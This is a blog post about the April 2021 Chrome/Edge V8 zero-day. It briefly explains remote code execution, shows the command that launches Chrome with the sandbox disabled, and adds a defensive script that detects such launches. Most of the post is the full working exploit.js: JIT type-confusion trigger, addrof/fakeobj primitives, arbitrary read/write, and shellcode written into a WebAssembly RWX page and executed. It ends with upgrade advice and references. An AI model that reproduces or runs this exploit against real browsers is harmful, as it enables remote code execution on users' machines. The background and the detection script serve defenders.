2021HW — Chrome 0day Vulnerability


Overview

In the early hours of April 13 (Beijing time), security researcher Rajvardhan Agarwal published on Twitter a 0day that achieves remote code execution (RCE) and works against the current versions of Google Chrome and Microsoft Edge.

To test the vulnerability, the researcher disabled the sandbox in Edge 89.0.774.76 and Chrome 89.0.4389.114.


Analysis: https://zhuanlan.zhihu.com/p/29097125

Principle

Remote OS command execution

This kind of vulnerability usually arises because the application, by design, has to give users an interface for running specific remote commands. A common example is the web management interface of routers, firewalls, intrusion detection appliances and similar devices, which typically offers a ping page: the user enters a target IP in the web form, submits it, and the backend runs a ping against that address and returns the result.

If the developer implementing such a feature does not apply strict security controls, an attacker may be able to submit "unexpected" commands through that interface and have the backend execute them, and so take control of the entire backend server.

Many enterprises now practise automated operations, with large numbers of system operations performed through an "automated ops platform". Remote OS command execution vulnerabilities frequently appear on exactly this kind of platform.

Remote code execution

By the same logic, because of design requirements the backend sometimes executes user input as part of its own code, which produces a remote code execution vulnerability, whether through code-execution functions or through unsafe deserialization and the like.

Therefore, if operational API interfaces must be exposed to front-end users, the content submitted to them has to be strictly validated; a strict whitelist policy, for example, is a good approach.

Impact

An RCE vulnerability lets an attacker remotely inject operating system commands or code directly into the backend server, and thereby take control of the backend system.

Vulnerability environment

"C:\Program Files\Google\Chrome\Application\chrome.exe" -no-sandbox

This disables the browser's sandbox, which is enabled by default.

In short, a normally configured browser cannot be exploited by this; unless......
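A defender-side check for the condition this section describes, added here as an example and not taken from the original post or from the PoC author: it tokenizes process command lines the way a Windows shell would (honouring double quotes), identifies Chrome and Edge binaries, and flags any instance launched with the -no-sandbox or --no-sandbox switch. The process records are constructed sample data; in practice the same function would be fed the CommandLine values from process-creation telemetry or from Get-CimInstance Win32_Process.

```javascript
// Added example (not from the original post or the PoC author): flag Chrome
// and Edge processes whose command line carries the sandbox-disabling switch
// that the exploit above depends on. Sample process records are constructed.

// Split a Windows-style command line into arguments, honouring double quotes
// so that paths with spaces (e.g. "C:\Program Files\...") stay one token.
function splitCommandLine(cmdline) {
  const tokens = [];
  let current = "";
  let inQuotes = false;
  let haveToken = false;
  for (const ch of cmdline) {
    if (ch === '"') {
      inQuotes = !inQuotes;
      haveToken = true;            // "" is still an (empty) argument
      continue;
    }
    if (!inQuotes && /\s/.test(ch)) {
      if (haveToken) {
        tokens.push(current);
        current = "";
        haveToken = false;
      }
      continue;
    }
    current += ch;
    haveToken = true;
  }
  if (haveToken) tokens.push(current);
  return tokens;
}

// Chromium accepts switches with either one or two leading dashes, and the
// original post launches chrome.exe with the single-dash form.
const SANDBOX_OFF_SWITCHES = new Set(["--no-sandbox", "-no-sandbox"]);

// True if the executable (first argument) is a Chrome or Edge browser binary.
function isChromiumBrowser(exePath) {
  const base = exePath.replace(/\\/g, "/").split("/").pop().toLowerCase();
  return ["chrome.exe", "msedge.exe", "chrome", "msedge"].includes(base);
}

// True if this command line starts a Chrome/Edge browser with the sandbox off.
function sandboxDisabled(cmdline) {
  const tokens = splitCommandLine(cmdline);
  if (tokens.length === 0 || !isChromiumBrowser(tokens[0])) return false;
  return tokens.slice(1).some((t) => SANDBOX_OFF_SWITCHES.has(t.toLowerCase()));
}

// Return the PIDs of all records that should be flagged.
function auditProcesses(records) {
  return records.filter((r) => sandboxDisabled(r.cmdline)).map((r) => r.pid);
}

// Constructed sample telemetry, e.g. the CommandLine field from
// Get-CimInstance Win32_Process. Only 1002 and 1003 should be flagged:
// 1001 is a normal launch and 1004 is not a browser at all.
const SAMPLE_PROCESSES = [
  { pid: 1001, cmdline: '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"' },
  { pid: 1002, cmdline: '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" -no-sandbox' },
  { pid: 1003, cmdline: '"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --no-sandbox --user-data-dir="C:\\temp\\edge profile"' },
  { pid: 1004, cmdline: "notepad.exe --no-sandbox" },
];

console.log("processes with sandbox disabled:", auditProcesses(SAMPLE_PROCESSES));
```

Because Chromium child processes inherit the parent's switches, a single launch with the sandbox off tends to show up as several flagged PIDs; deduplicating on the parent process is a reasonable follow-up when this is wired to real telemetry.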

Process

<script src="exploit.js"></script>

/*
BSD 2-Clause License

Copyright (c) 2021, rajvardhan agarwal
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
    var x = 1;
    x = (_arr[0] ^ 0) + 1;
    x = Math.abs(x);
    x -= 2147483647;
    x = Math.max(x, 0);
    x -= 1;
    if(x==-1) x = 0;
    var arr = new Array(x);
    arr.shift();
    var cor = [1.1, 1.2, 1.3];
    return [arr, cor];
}

for(var i=0;i<0x3000;++i)
    foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];

const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);

var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}

function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);

    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();

By executing the shellcode, the attack makes the browser carry out the RCE command.

Remediation

Upgrade promptly to the latest version of Google Chrome (https://www.google.com/intl/zh-CN/chrome/) and of Microsoft Edge (https://www.microsoft.com/en-us/edge).

References

[1] https://bugs.chromium.org/p/chromium/issues/detail?id=1053604

[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418

[3] https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html

[4] https://www.zdnet.com/article/google-patches-chrome-zero-day-under-active-attacks/

[5] https://docs.microsoft.com/zh-cn/deployedge/microsoft-edge-relnotes-security


Copyright notice: published by 玥玥 on 2021-04-14 23:08:51.
When reposting, please credit: 2021HW — Chrome 0day Vulnerability | 女黑客导航